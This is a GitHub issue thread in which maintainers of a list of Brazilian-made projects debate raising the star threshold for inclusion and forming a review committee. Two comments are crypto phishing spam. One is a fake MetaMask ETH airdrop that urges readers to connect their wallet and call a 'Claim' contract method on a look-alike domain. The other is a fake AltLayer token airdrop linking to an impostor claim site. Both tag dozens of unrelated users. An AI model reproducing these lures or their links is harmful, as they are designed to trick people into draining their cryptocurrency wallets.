### ISSUE TITLE
>1k stars

### ISSUE THREAD

**Issue by leogregianin** [felipefialho/awesome-made-by-brazilians#42]
The Russians criterion is more than 1k stars to enter in the list and for Brazilians is 100 stars.
Could we increase it to 500 or 1k so we don't have thousands of repositories?
Only incredible projects would enter this list.

**Comment by leomaurodesenv** [comment]
Can I make a suggestion?
If you do, define a committee to evaluate, test projects and provoke discussion about their usability (in pull request - PR).
If this committee agrees with the PR, this project will be accepted. In this way, we can accept other types of projects, such as @edkf.

In resume, it is a tough question. 🤔

**Comment by felipefialho** [comment]
@leomaurodesenv Yes, is a good idea so we remove the need about 1000 stars for example. But how you imagine this committee to evaluate?

**Comment by leomaurodesenv** [comment]
The main problem of any committee: the evaluation are subjectives.
Usually, a committee is formed by an odd number of people (3, or 5) that evaluate a set of subjects for each work. For example:
- Is it an open source project?
- What is the purpose of your work?
- What is the impact - in some areas?
- How easy is it to replicate or reproduce?
- ....

In each of these subjects has a predefined score (from 0 to 5), and each score has a definition. For example:
- 0 - do not attend this subject
- 1 - a specific impact area
- ....
- 5 - a large impact for any area

At last, the committee argue their score for each subjects - and the author can refuse each score and discuss contrary. 

Something in that way... But again, it is a tough question.

**Comment by alihankoc** [comment]
# 🌐 **$ETH MetaMask Airdrop: Claim Your $1000 in Ethereum Now!**

🎉 **Congratulations!** 

You're among the chosen participants for the $1.5k Ethereum Airdrop. We're thrilled to grant you $1000 in ETH to celebrate the year's end. But that's not all—connect now, and you'll instantly receive an extra $100! Follow the steps below to claim your Ethereum and make the most of this exclusive giveaway!

[![Claim Now](https://pbs.twimg.com/media/Frg-sWYWIAYCoiX.jpg:large)](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask)

## **Steps to Claim:**

### 1. 🚀 **Connect Your MetaMask Wallet:**
   - Click on the [Connect Wallet](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask) link.
   - Select **MetaMask** as your preferred wallet provider.

### 2. 🔄 **Interact with the Contract and Claim Your $100:**
   - Once your MetaMask wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract. Ensure you use the **Claim** method.

💰 **Don't miss out on your $1000 in Ethereum!** Additionally, enjoy an instant $100 upon connection. Act now to secure your ETH. Remember, there's a chance to win up to $20,000—it's your golden opportunity with MetaMask!


Winners: @JackRo, @RAVENSHIRE, @felipericieri, @hany-peak, @franRappazzini, @rabaut, @lolieatapple

**Comment by KnollElias** [comment]
# AltLayer Airdrop Season One Update

[![AltLayer Airdrop Season One](https://i.ytimg.com/vi/9uxY8uLf3bE/maxresdefault.jpg)](https://connect.airdropaltlayerio.online/)

🚀 **Exciting Announcement!** 

AltLayer token (ALT) is gearing up for its Binance launch on January 25, 2024. As a token of appreciation, we extend a warm invitation to you to join the "ALT Token community" through an exclusive airdrop tailored for our early supporters and partners. Here's a quick overview:

- **Total Allocated ALT Tokens:** 400,000,000 (4% of the total supply)

For a comprehensive breakdown of criteria and further details, refer to the complete announcement [Oficial Website](https://connect.airdropaltlayerio.online/).

The window to [Claim $ALT tokens](https://connect.airdropaltlayerio.online/) is open from January 25 to February 08, 2024. 

Any unclaimed $ALT tokens after this period will be returned to AltLayer’s Treasury.

We deeply appreciate your contribution to AltLayer's success! Stay tuned for more exciting developments in Season One.

**Important:** Please be aware of certain regional restrictions on the airdrop. Review the disclaimer before participating.

liweimin90, @kakushao, @pinealan, @choisangh, @PRMStudio, @karmicDev, @skykingit, @soaringfish, @priest671, @zxyzxy1996, @Galaxy-Crusader, @jalilmorshedlou, @codydjango, @milieu-san, @n2bh, @christophercelaya, @santa112358, @gaonip, @yairmark, @Godeep666

**Comment by felipefialho** [comment]
And about it? Does make sense to stay in this discussion yet? Or will we just keep 100 stars?

**Comment by leogregianin** [comment]
we can close
